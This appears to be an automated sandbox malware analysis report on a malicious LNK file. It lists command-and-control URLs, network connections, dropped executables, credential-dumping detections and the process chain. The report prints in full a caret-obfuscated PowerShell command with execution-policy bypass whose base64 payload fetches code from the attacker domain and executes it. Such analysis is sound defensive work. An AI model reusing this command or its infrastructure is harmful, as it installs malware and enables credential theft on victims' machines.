        Source: powershell.exe, 00000002.00000002.2740483057.000001AC1F881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.0000026909101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2971436736.00000226E33C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2986898619.0000020380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 0000001C.00000002.3223482827.0000018B10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 0000001C.00000002.3223482827.0000018B10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 0000001C.00000002.3223482827.0000018B10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: svczHost.exe, 00000014.00000002.3843098469.000001519D648000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002D.00000002.3845815946.00007FF7A62D8000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/MartinKuschnik/WmiLight
        Source: powershell.exe, 00000008.00000002.2635351639.000002690A5CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2986898619.000002038022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B0022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000002.00000002.2740483057.000001AC1FAAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.000002690936A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2986898619.000002038022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B0022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXzo
        Source: powershell.exe, 00000008.00000002.2635351639.000002690A5F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.000002690A5CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pesterh
        Source: powershell.exe, 0000000D.00000002.3347031829.00000226F3463000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000000.2951489622.00007FF70A7F1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3850480563.00007FF70A7F1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3843098469.000001519D648000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002D.00000002.3845815946.00007FF7A62D8000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtime
        Source: powershell.exe, 00000008.00000002.2635351639.000002690A02A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.0000026909F40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2986898619.00000203809B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000002.00000002.2800553876.000001AC2F8F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.000002690A74C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2654660804.0000026919177000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3240844054.00000203901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2986898619.0000020381455000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3240844054.0000020390073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B014EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3223482827.0000018B10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000002.00000002.2739318814.000001AC1F6E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2658354126.0000026921256000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3412391494.00000226FB537000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3839967276.0000015199A32000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3303975051.00000203F54FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3286821473.0000018B69B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: powershell.exe, 00000008.00000002.2635351639.000002690A0A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
        Source: powershell.exe, 00000002.00000002.2740483057.000001AC1FAAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.000002690936A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2971436736.00000226E3745000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2971436736.00000226E4B2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com
        Source: powershell.exe, 00000002.00000002.2740483057.000001AC1FAAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/KQ
        Source: svczHost.exe, 00000014.00000002.3841352586.000001519CC9B000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3841352586.000001519CC90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/StaticFile/RdpService/2
        Source: svczHost.exe, 00000014.00000002.3841352586.000001519CC9B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/StaticFile/RdpService/2h
        Source: powershell.exe, 00000002.00000002.2740483057.000001AC211D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de
        Source: powershell.exe, 00000002.00000002.2740483057.000001AC1FC70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c3211831a2f0a5
        Source: powershell.exe, 0000000D.00000002.2971436736.00000226E377A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2971436736.00000226E4B2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118677f2014
        Source: powershell.exe, 00000002.00000002.2740483057.000001AC1FF58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2740483057.000001AC21985000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118a9258d33
        Source: powershell.exe, 00000002.00000002.2740483057.000001AC1FC70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118c793735a
        Source: powershell.exe, 00000002.00000002.2740483057.000001AC211D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file
        Source: powershell.exe, 0000000D.00000002.2971436736.00000226E33C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2971436736.00000226E35EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/0fdaa038ad6c2eea45102e7ca9fa4167858efe9d7995f0cf42f1da8090402cefc2
        Source: powershell.exe, 00000002.00000002.2740483057.000001AC1FC70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2740483057.000001AC1FF07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/211ffceba97c49c33c18b8f61c4b0441273eed18f1e2ef7d812789867755b3eb28
        Source: powershell.exe, 0000000D.00000002.2971436736.00000226E377A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec469e8a8f676c6e21bae43b153c3c581617ac5
        Source: powershell.exe, 00000002.00000002.2740483057.000001AC211D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2740483057.000001AC1FF58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2740483057.000001AC1FFB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/4b9c61cb1e322589ff1c332a29228a9797ad1ca507caa63132cd31e860fea5dd02
        Source: powershell.exe, 00000008.00000002.2635351639.000002690936A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/4c4ffc93c89dfb9b826b1b24bd745331d0c2aafb3bfb560c0ae79c0e2962291528
        Source: powershell.exe, 00000002.00000002.2740483057.000001AC1FC70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/c6ae6756346c38969223ba2f8fc7c40738b6e97509be44a06793b0d51b847db109
        Source: powershell.exe, 00000002.00000002.2740483057.000001AC1FC70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file3/f40ab6a53a650d71af6d58782cf944eb3bbe65ce71f776cf45ebb488d0de6ad04d
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: unknownHTTPS traffic detected: 104.21.86.219:443 -> 192.168.11.20:49714 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.86.219:443 -> 192.168.11.20:49722 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.86.219:443 -> 192.168.11.20:49727 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.86.219:443 -> 192.168.11.20:49738 version: TLS 1.2

        Spam, unwanted Advertisements and Ransom Demands

        barindex
        Reads the Security eventlog
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\RdpService
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Reads the System eventlog
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\RdpService
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\RdpService

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: U82W1yZAYQ.lnk, type: SAMPLEMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
        Source: amsi64_3372.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: 45.2.myRdpService.exe.7ff7a5c10000.0.unpack, type: UNPACKEDPEMatched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
        Source: 0000002D.00000002.3845244582.00007FF7A6116000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
        Source: Process Memory Space: powershell.exe PID: 2012, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 3372, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: svczHost.exe PID: 9104, type: MEMORYSTRMatched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
        Source: Process Memory Space: myRdpService.exe PID: 5032, type: MEMORYSTRMatched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
        Powershell drops PE file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\svczHost.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC44C6F1C62_2_00007FFC44C6F1C6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC44C6FF722_2_00007FFC44C6FF72
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFC44C651DA13_2_00007FFC44C651DA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFC44D3AB9113_2_00007FFC44D3AB91
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFC44C9854224_2_00007FFC44C98542
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFC44C9779624_2_00007FFC44C97796
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFC44C5BB6928_2_00007FFC44C5BB69
        Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\myRdpService.exe 5B570471125EA0A0E5E693AB8493381A59E08C909472B461A9B1FF007CD1BB12
        Source: svczHost.exe.13.drStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3691
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3644
        Source: C:\Windows\Temp\svczHost.exeProcess created: Commandline size = 2904
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3691Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3644
        Source: C:\Windows\Temp\svczHost.exeProcess created: Commandline size = 2904
        Source: U82W1yZAYQ.lnk, type: SAMPLEMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
        Source: amsi64_3372.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: 45.2.myRdpService.exe.7ff7a5c10000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
        Source: 0000002D.00000002.3845244582.00007FF7A6116000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
        Source: Process Memory Space: powershell.exe PID: 2012, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 3372, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: svczHost.exe PID: 9104, type: MEMORYSTRMatched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
        Source: Process Memory Space: myRdpService.exe PID: 5032, type: MEMORYSTRMatched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
        Source: classification engineClassification label: mal100.troj.expl.evad.winLNK@66/55@1/3
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2508:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6388:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:956:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6388:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5836:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5580:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5580:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2508:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5836:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:956:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3568:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3568:120:WilError_03
        Source: C:\Windows\Temp\myRdpService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3152:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7888:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3152:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6832:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\STARTUAC
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8600:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6832:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7888:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3568:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8600:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3052:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9112:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9112:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3052:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3568:304:WilStaging_02
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wvjunkvh.yzr.ps1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
        Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: U82W1yZAYQ.lnkReversingLabs: Detection: 15%
        Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /v /k "S^T^aR^T /M^I^n "" P^oWer^s^H^eL^l -W H^iDde^n -No^l^OGO -N^o^p -ep B^YPA^sS -eN^c^oDe^d^cOmMAn^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA="" && exit
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA="
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES352B.tmp" "c:\Users\user\AppData\Local\Temp\vz2enilj\CSC2427E8DFE2D64B98811230F26E9EEEB4.TMP"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\Meeting-Registration.pdf.docx" /o ""
